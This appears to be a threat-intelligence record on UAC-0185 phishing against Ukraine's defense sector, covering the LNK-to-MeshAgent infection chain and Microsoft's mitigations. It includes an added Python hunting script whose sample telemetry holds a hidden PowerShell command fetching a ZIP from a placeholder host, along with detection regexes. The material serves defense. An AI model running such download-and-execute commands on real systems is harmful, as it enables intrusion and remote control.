Source |
RiskIQ |
Identifier |
8622342 |
Publication date |
2024-12-09 15:40:00 (viewed: 2024-12-09 16:08:36) |
Title |
Targeted cyberattacks UAC-0185 against the Defense Forces and enterprises of the defense industry of Ukraine |
Text |
#### Targeted Geolocations
- Ukraine
## Snapshot
Ukrainian authorities have uncovered a cyber campaign by UAC-0185 (UNC4221), targeting Ukrainian defense and industrial sectors with malicious emails impersonating the Ukrainian Union of Industrialists and Entrepreneurs (ULIE). The campaign leverages phishing emails containing malicious hyperlinks that lead to the deployment of the remote management tool MeshAgent, aiming to steal credentials and establish unauthorized access to military and enterprise systems.
## Description
On December 4, 2024, the Computer Emergency Response Team of Ukraine (CERT-UA) received reports of phishing emails sent under the guise of ULIE, promoting a conference on transitioning Ukrainian defense industry products to NATO technical standards. These emails contained a hyperlink that, when clicked, downloaded a malicious LNK file, which executed an HTA file through mshta.exe. The HTA file utilized PowerShell commands to download and execute additional files, including a ZIP archive with three components: a batch file (Main.bat), another HTA file (Registry.hta), and an executable (update.exe). This sequence culminated in the execution of "update.exe," identified as MESHAGENT, a remote management tool.
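One way to hunt for the execution chain described above (LNK → mshta.exe → PowerShell download → Main.bat / Registry.hta / update.exe) in process-creation telemetry. This is an added example, not code from the CERT-UA or Microsoft report; the events are constructed, and the field names (pid, ppid, image, cmdline) and the download URL are assumed placeholders.

```python
import re
from collections import defaultdict

# Constructed process-creation events (Sysmon Event ID 1 style; field names assumed).
# The URL is a placeholder, not an indicator from the report.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 210, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\u\Downloads\conference.hta"},
    {"pid": 320, "ppid": 210,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -c Invoke-WebRequest http://PLACEHOLDER/p.zip -OutFile $env:TEMP\p.zip"},
    {"pid": 430, "ppid": 320, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\u\AppData\Local\Temp\Main.bat"},
    {"pid": 540, "ppid": 430, "image": r"C:\Users\u\AppData\Local\Temp\update.exe",
     "cmdline": "update.exe"},
    # Benign admin PowerShell not spawned by mshta.exe: must not produce a finding.
    {"pid": 600, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Service"},
]

# PowerShell download primitives / archive fetch, and the second-stage file names named in the report.
DOWNLOAD_RE = re.compile(r"invoke-webrequest|downloadfile|downloadstring|\biwr\b|\.zip", re.I)
STAGE2_RE = re.compile(r"main\.bat|registry\.hta|update\.exe", re.I)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def descendants(children, pid):
    """Yield every process event below pid in the parent/child tree."""
    stack = list(children.get(pid, []))
    while stack:
        ev = stack.pop()
        yield ev
        stack.extend(children.get(ev["pid"], []))

def find_mshta_chains(events):
    """One finding per mshta.exe running an .hta whose child PowerShell downloads
    content and whose descendants run Main.bat, Registry.hta or update.exe."""
    children = defaultdict(list)
    for ev in events:
        children[ev["ppid"]].append(ev)
    findings = []
    for ev in events:
        if basename(ev["image"]) != "mshta.exe" or ".hta" not in ev["cmdline"].lower():
            continue
        for ps in children.get(ev["pid"], []):
            if basename(ps["image"]) != "powershell.exe" or not DOWNLOAD_RE.search(ps["cmdline"]):
                continue
            stage2 = [d["pid"] for d in descendants(children, ps["pid"])
                      if STAGE2_RE.search(d["cmdline"]) or STAGE2_RE.search(d["image"])]
            if stage2:
                findings.append({"mshta_pid": ev["pid"], "powershell_pid": ps["pid"], "stage2_pids": stage2})
    return findings
```

Requiring all three stages keeps the rule quiet on legitimate HTA or PowerShell use while still catching the full sequence; a lower-fidelity hunt can drop the stage-two condition.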
## Microsoft Analysis and Additional OSINT Context
The abuse of remote monitoring and management (RMM) tools by both cybercriminals and nation-state actors represents a significant and growing threat. MeshAgent is an open-source [remote management tool](https://sip.security.microsoft.com/intel-explorer/articles/9782a9ef) that has been exploited by various threat actors to gain unauthorized access to victims' computers. It can gather essential system information for remote management and offers features like power and account management, chat or message pop-ups, file transfer, and command execution. Additionally, it supports web-based remote desktop capabilities such as RDP and VNC. While users can utilize this tool for legitimate remote system management, these features are also highly attractive to malicious actors. For example, in August, [CERT-UA reported](https://sip.security.microsoft.com/intel-explorer/articles/560ec243) on a mass phishing campaign that led to the delivery of AnonVNC malware, which is derived from MeshAgent.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Review our technique profile on [abuse of remote monitoring and management tools](https://sip.security.microsoft.com/intel-explorer/articles/9782a9ef) for blocking and hunting for tools like MeshAgent.
- Pilot and deploy [phishing-resistant authentication methods for users.](https://learn.microsoft.com/en-us/entra/identity/authentication/concept-authentication-methods?ocid=magicti_ta_learndoc)
- Configure Microsoft Defender for Office 365 to [recheck links on click.](https://learn.microsoft.com/en-us/defender-office-365/safe-links-about?ocid=magicti_ta_learndoc) Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and links in email messages, other Microsoft 365 applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular [anti-spam](https://learn.microsoft.com/en-us/defender-office-365/anti-spam-protection-about?ocid=magicti_ta_learndoc) and [anti-malware](https://learn.microsoft.com/en-us/defender-office-365/anti-malware-protection-about?ocid=magicti_ta_learndoc) protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect your organization from malicious links used in phishing and other attacks.
- Encourage users to use Microsoft Edge and other web browsers that support [Microsoft Defender SmartScreen](https://learn.microsoft.com/en-us/deployedge/microsoft-edge-security-smartscreen?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, sca |
Notes |
★★★ |
Sent |
Yes |
Tags |
Malware
Tool
Threat
Industrial
Conference
Technical
|